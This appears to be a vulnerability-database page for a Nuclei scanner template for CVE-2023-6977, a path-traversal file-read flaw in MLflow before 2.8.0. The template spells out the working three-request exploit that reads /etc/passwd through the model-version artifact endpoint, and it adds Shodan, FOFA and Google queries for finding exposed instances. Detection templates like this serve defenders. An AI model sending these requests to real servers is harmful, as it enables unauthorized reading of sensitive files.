Lucene search
ProjectDiscoveryNUCLEI:CVE-2023-6977HistoryJan 26, 2024 - 7:20 a.m.
Mlflow <2.8.0 - Local File Inclusion
2024-01-2607:20:29
ProjectDiscovery
github.com
9
mlflow
cve2023
lfi
lfprojects
oss
intrusive
file inclusion
vulnerability
cvss 7.5
CVSS3
7.5
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
AI Score
7.6
Confidence
High
EPSS
0.006
Percentile
77.9%
Mlflow before 2.8.0 is susceptible to local file inclusion due to path traversal in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
id: CVE-2023-6977
info:
name: Mlflow <2.8.0 - Local File Inclusion
author: gy741
severity: high
description: |
Mlflow before 2.8.0 is susceptible to local file inclusion due to path traversal in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
impact: |
Successful exploitation could allow an attacker to read sensitive files on the server.
remediation: |
Upgrade Mlflow to version 2.9.2 or later to mitigate the vulnerability.
reference:
- https://huntr.com/bounties/fe53bf71-3687-4711-90df-c26172880aaf
- https://nvd.nist.gov/vuln/detail/CVE-2023-6977
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-6977
cwe-id: CWE-29
epss-score: 0.00494
epss-percentile: 0.76167
cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
vendor: lfprojects
product: mlflow
shodan-query: http.title:"mlflow"
fofa-query:
- title="mlflow"
- app="mlflow"
google-query: intitle:"mlflow"
tags: cve,cve2023,mlflow,oss,lfi,intrusive,lfprojects
http:
- raw:
- |
POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json; charset=utf-8
{"name":"{{randstr}}"}
- |
POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json; charset=utf-8
{"name":"{{randstr}}","source":"//proc/self/root"}
- |
GET /model-versions/get-artifact?name={{randstr}}&path=etc%2Fpasswd&version=1 HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: word
part: header_3
words:
- "filename=passwd"
- "application/octet-stream"
condition: and
- type: status
status:
- 200
# digest: 4b0a004830460221008702f8bb7a5c93868381e03fb38369b7d7a15d2001f06633b74279f1e482280b02210093a5a577ec94663ec705c50930361777c323c8252a7ae768227ee4a78542491b:922c64590222798bb761d5b6d8e72950Related
cve
cve
CVE-2023-6977
2023-12-20 06:15:45
osv
osv
BIT-mlflow-2023-6977
2024-03-06 10:56:07
CVE-2023-6977
2023-12-20 06:15:45
MLflow Local File Disclosure Vulnerability
2023-12-20 06:30:25
cvelist
cvelist
CVE-2023-6977 Path Traversal: '\..\filename'
2023-12-20 05:37:12
nvd
nvd
CVE-2023-6977
2023-12-20 06:15:45
veracode
veracode
Path Traversal
2023-12-21 08:22:25
github
github
MLflow Local File Disclosure Vulnerability
2023-12-20 06:30:25
prion
prion
Design/Logic Flaw
2023-12-20 06:15:00
CVSS3
7.5
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
AI Score
7.6
Confidence
High
EPSS
0.006
Percentile
77.9%
Related for NUCLEI:CVE-2023-6977